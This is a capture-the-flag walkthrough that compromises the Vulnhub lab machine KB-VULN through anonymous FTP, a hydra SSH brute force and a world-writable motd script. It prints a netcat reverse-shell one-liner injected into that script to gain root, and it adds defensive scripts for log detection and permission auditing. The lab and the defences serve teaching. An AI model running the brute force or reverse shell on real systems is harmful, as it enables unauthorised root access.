Today we are going to hack the Vulnhub machine called KB-VULN. You can download it from the following link: KB-VULN

We start with an nmap scan to see which ports are open.

~ > nmap -A -p-                                                  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST
Nmap scan report for
Host is up (0.00064s latency).
Not shown: 65532 closed ports
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
| ssh-hostkey: 
|   2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
|   256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_  256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OneSchool — Website by Colorlib
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds

We see that the FTP, SSH and HTTP ports are open. In the source code of the initial web page we find the following comment:

Username : sysadmin 

Separately, we connect to the FTP server using the credentials anonymous/anonymous.

~/KB > ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 .
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 ..
-rw-r--r--    1 0        0              54 Aug 22 17:39 .bash_history
226 Directory send OK.

We see there is a .bash_history file. Let's download it.

ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .bash_history (54 bytes).
226 Transfer complete.
54 bytes received in 0.00 secs (73.3441 kB/s)

Let's take a look at the file's contents...

~/KB > cat .bash_history                                                      
cd /etc/update-motd.d/
nano 00-header

We see that it "edits" the 00-header file. Only root should be able to edit that file, since it runs every time someone logs into the system. If we get access to the system and can edit the file, we can use it to escalate our privileges. Since there is no other way in, we brute-force SSH against the user we found in the web page comment, sysadmin.

~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: sysadmin   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 

We found the password :) Let's log in!
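From the server side, a run like the hydra session above is very loud: on this box (Ubuntu 18.04, OpenSSH 7.6) sshd writes one "Failed password" line to /var/log/auth.log per attempt and an "Accepted password" line when a guess succeeds. The following shell script is an added example and is not part of the original writeup: it counts failed password attempts per source address and flags the addresses that went on to log in successfully, which is the case a defender should escalate first because the account is already compromised. The log lines are constructed to mirror this attack and use RFC 5737 documentation addresses; the function names sample_auth_log and ssh_guess_report are my own.

```shell
#!/bin/sh
# Added example (not from the original writeup): detect an SSH password
# guessing run from auth.log and report whether it eventually succeeded.

# Constructed sample of what sshd logs during such a run. 192.0.2.10 is
# the guessing host; 198.51.100.7 is a user who mistyped once, then got in.
sample_auth_log() {
cat <<'EOF'
Sep 10 10:55:01 kb-server sshd[2201]: Failed password for sysadmin from 192.0.2.10 port 40122 ssh2
Sep 10 10:55:01 kb-server sshd[2203]: Failed password for sysadmin from 192.0.2.10 port 40123 ssh2
Sep 10 10:55:02 kb-server sshd[2205]: Failed password for sysadmin from 192.0.2.10 port 40124 ssh2
Sep 10 10:55:02 kb-server sshd[2207]: Failed password for invalid user admin from 192.0.2.10 port 40125 ssh2
Sep 10 10:55:03 kb-server sshd[2209]: Failed password for sysadmin from 192.0.2.10 port 40126 ssh2
Sep 10 10:55:03 kb-server sshd[2211]: Failed password for sysadmin from 192.0.2.10 port 40127 ssh2
Sep 10 10:55:04 kb-server sshd[2213]: Accepted password for sysadmin from 192.0.2.10 port 40128 ssh2
Sep 10 11:02:15 kb-server sshd[2300]: Failed password for sysadmin from 198.51.100.7 port 51000 ssh2
Sep 10 11:02:20 kb-server sshd[2302]: Accepted password for sysadmin from 198.51.100.7 port 51001 ssh2
EOF
}

# ssh_guess_report [THRESHOLD]  < auth.log
# Prints "<ip> <failures> <accepted>" for every source address with at
# least THRESHOLD (default 5) failed password attempts. "accepted" counts
# successful logins from that address that came *after* the threshold was
# reached; a non-zero value means the guessing worked.
ssh_guess_report() {
    threshold="${1:-5}"
    awk -v t="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # The source address follows the word "from"; its field number
            # shifts when the line contains "invalid user", so search for it.
            for (i = 1; i <= NF; i++) if ($i == "from") { fail[$(i+1)]++; break }
        }
        /sshd\[[0-9]+\]: Accepted / {
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i+1); break }
            # Only a success that follows enough failures counts as a hit.
            if (fail[ip] >= t) ok[ip]++
        }
        END {
            for (ip in fail) if (fail[ip] >= t)
                printf "%s %d %d\n", ip, fail[ip], ok[ip] + 0
        }'
}

# "sh ssh_guess.sh demo" (script name assumed) runs the report over the
# constructed sample; on a real host use: ssh_guess_report 10 < /var/log/auth.log
if [ "${1:-}" = demo ]; then
    sample_auth_log | ssh_guess_report 5
fi
```

Against the sample with the default threshold the report is a single line, `192.0.2.10 6 1`: six failures followed by a success. The ordinary user who failed once is below the threshold and is not listed. Pairing this with a rate limiter such as fail2ban, or moving the account to key-only authentication, removes the password-guessing path that was used here.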

Low Shell

~ > ssh sysadmin@                                                 
sysadmin@'s password: 


Last login: Sat Aug 22 18:00:48 2020
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.


sysadmin@kb-server:~$ ls -la
total 40
drwxr-xr-x 5 sysadmin sysadmin 4096 Aug 22 18:04 .
drwxr-xr-x 3 root     root     4096 Aug 22 17:53 ..
-rw------- 1 sysadmin sysadmin   16 Aug 22 18:04 .bash_history
-rw-r--r-- 1 sysadmin sysadmin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 22 17:02 .cache
drwxrwxr-x 2 sysadmin sysadmin 4096 Aug 22 17:39 ftp
drwx------ 3 sysadmin sysadmin 4096 Aug 22 17:02 .gnupg
-rw-r--r-- 1 sysadmin sysadmin  807 Apr  4  2018 .profile
-rw-r--r-- 1 root     root       33 Aug 22 17:54 user.txt
sysadmin@kb-server:~$ cat user.txt

Privilege Escalation

Let's check whether we can modify the 00-header file, as seen earlier...

sysadmin@kb-server:~$ ls -l /etc/update-motd.d/00-header 
-rwxrwxrwx 1 root root 989 Aug 22 17:08 /etc/update-motd.d/00-header

We can :) We edit it to add a line at the end that gives us a reverse shell to our machine with privileges!

sysadmin@kb-server:~$ nano /etc/update-motd.d/00-header
echo "\n\t\t\tWELCOME TO THE KB-SERVER\n"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8888 >/tmp/f

We set nc listening.

~ > nc -nlvp 8888                                                            
listening on [any] 8888 ...

We log in again as the user and obtain the reverse shell...

~ > nc -nlvp 8888                                                         
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 52826
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)


# cd /root
# ls
# cat flag.txt



And with that we are root on the machine.
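The root cause of this escalation is the permission shown earlier: /etc/update-motd.d/00-header is -rwxrwxrwx, while pam_motd runs every script in that directory as root on each login, so anyone with a shell can have root execute arbitrary commands. The following POSIX shell script is an added example, not part of the original writeup, that audits an update-motd.d directory for files a non-root user could modify and shows the remediation (the stock ownership and mode for these scripts is root:root 0755). The function names audit_motd_dir and fix_motd_dir, the optional expected-owner argument and the script name are my own choices.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit an update-motd.d
# directory for scripts that a non-root user could modify. pam_motd runs
# every script in /etc/update-motd.d as root on each login, so a file that
# is group- or world-writable, or not owned by root, is the
# privilege-escalation path used above.

# audit_motd_dir [DIR] [OWNER]
# DIR defaults to /etc/update-motd.d, OWNER to root (the owner every
# script there is expected to have). Lists offending files and returns 1
# when any are found, 0 when the directory is clean, 2 if it is missing.
audit_motd_dir() {
    dir="${1:-/etc/update-motd.d}"
    owner="${2:-root}"
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 2; }
    # -perm -002: writable by others, -perm -020: writable by group,
    # ! -user: owned by someone other than the expected owner.
    found=$(find "$dir" -maxdepth 1 -type f \
        \( -perm -002 -o -perm -020 -o ! -user "$owner" \) -print)
    if [ -z "$found" ]; then
        echo "OK: no scripts in $dir are modifiable by non-$owner users"
        return 0
    fi
    echo "WARNING: scripts in $dir modifiable by non-$owner users:"
    for f in $found; do
        ls -l "$f"
    done
    return 1
}

# fix_motd_dir [DIR]
# Remediation, to be run as root: restore the stock ownership and mode
# (root:root 0755) on every regular file in DIR.
fix_motd_dir() {
    dir="${1:-/etc/update-motd.d}"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        chown root:root "$f" && chmod 0755 "$f"
    done
}

# "sh motd_audit.sh run" (script name assumed) audits the real directory;
# "sh motd_audit.sh fix" repairs it as root and re-runs the audit.
case "${1:-}" in
    run) audit_motd_dir ;;
    fix) fix_motd_dir && audit_motd_dir ;;
esac
```

The audit exits non-zero when it finds something, so it can run from cron or a configuration-check job and page on failure. On the lab machine it would list 00-header with mode 777; after fix_motd_dir the file is root-only writable again and the .bash_history hint in the FTP share no longer leads anywhere.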